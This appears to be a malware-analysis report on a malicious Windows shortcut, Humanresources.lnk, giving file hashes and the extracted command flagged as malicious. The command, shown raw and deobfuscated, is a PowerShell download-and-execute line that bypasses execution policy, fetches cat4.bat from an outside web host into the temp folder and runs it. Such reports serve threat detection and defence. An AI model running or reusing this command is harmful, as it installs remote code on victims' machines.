|
Hash | Hash Value |
|---|---|
| MD5 | 2f1a976c58a05cc66d910b144779c061
|
| Sha1 | f41ea8a209713ef4f2ea89314aade5f1e97d4a9a
|
| Sha256 | 1f32a1315838dca9212d636d8667a34ddc60901bd0132744d94d7450965b5d0c
|
| Sha384 | 2b05a370a021d74184370485fb398308b1bf0430b4b9c1ef1cb3a482451ea1b263e6c5c6c9039e54b8c6c121d91a6082
|
| Sha512 | 4aec7d83b3b9abdc3d4b5149cbfdd383ee9ef46352bd6edd0fb7506a6001b33061fbcd84ed9a0820b6b24e08f27d090a303a3595c6f70433bf9a67075d534f89
|
| SSDeep | 24:96EX4lrkxQWLjc5ierpagonhFSK8tgnl5yOEYl:9HQ3aYfB/gl7
|
| TLSH | 26115213CD5ACD82CD18F9B0031A7B52AE59D02D98311AB405696E7D859721A5CE0C0D
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell -ep Bypass -c "[Net.ServicePointManager]::SecurityProtocol='Tls12'; irm 'https://divinelinksedu.com.ng/wp-content/cache/speedycache/cat4.bat' -o %TEMP%\cat4.bat" && %TEMP%\cat4.bat |
| Deobfuscated PowerShell | "[Net.ServicePointManager]::SecurityProtocol='Tls12'; irm 'https://divinelinksedu.com.ng/wp-content/cache/speedycache/cat4.bat' -o %TEMP%\cat4.bat" && %temp%\cat4.bat |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell -ep Bypass -c "[Net.ServicePointManager]::SecurityProtocol='Tls12'; irm 'https://divinelinksedu.com.ng/wp-content/cache/speedycache/cat4.bat' -o %TEMP%\cat4.bat" && %TEMP%\cat4.bat Malicious |
2f1a976c58a05cc66d910b144779c061 > Humanresources.lnk |
| Deobfuscated PowerShell | "[Net.ServicePointManager]::SecurityProtocol='Tls12'; irm 'https://divinelinksedu.com.ng/wp-content/cache/speedycache/cat4.bat' -o %TEMP%\cat4.bat" && %temp%\cat4.bat Malicious |
2f1a976c58a05cc66d910b144779c061 > Humanresources.lnk > LNK CommandLine > [PowerShell Command] |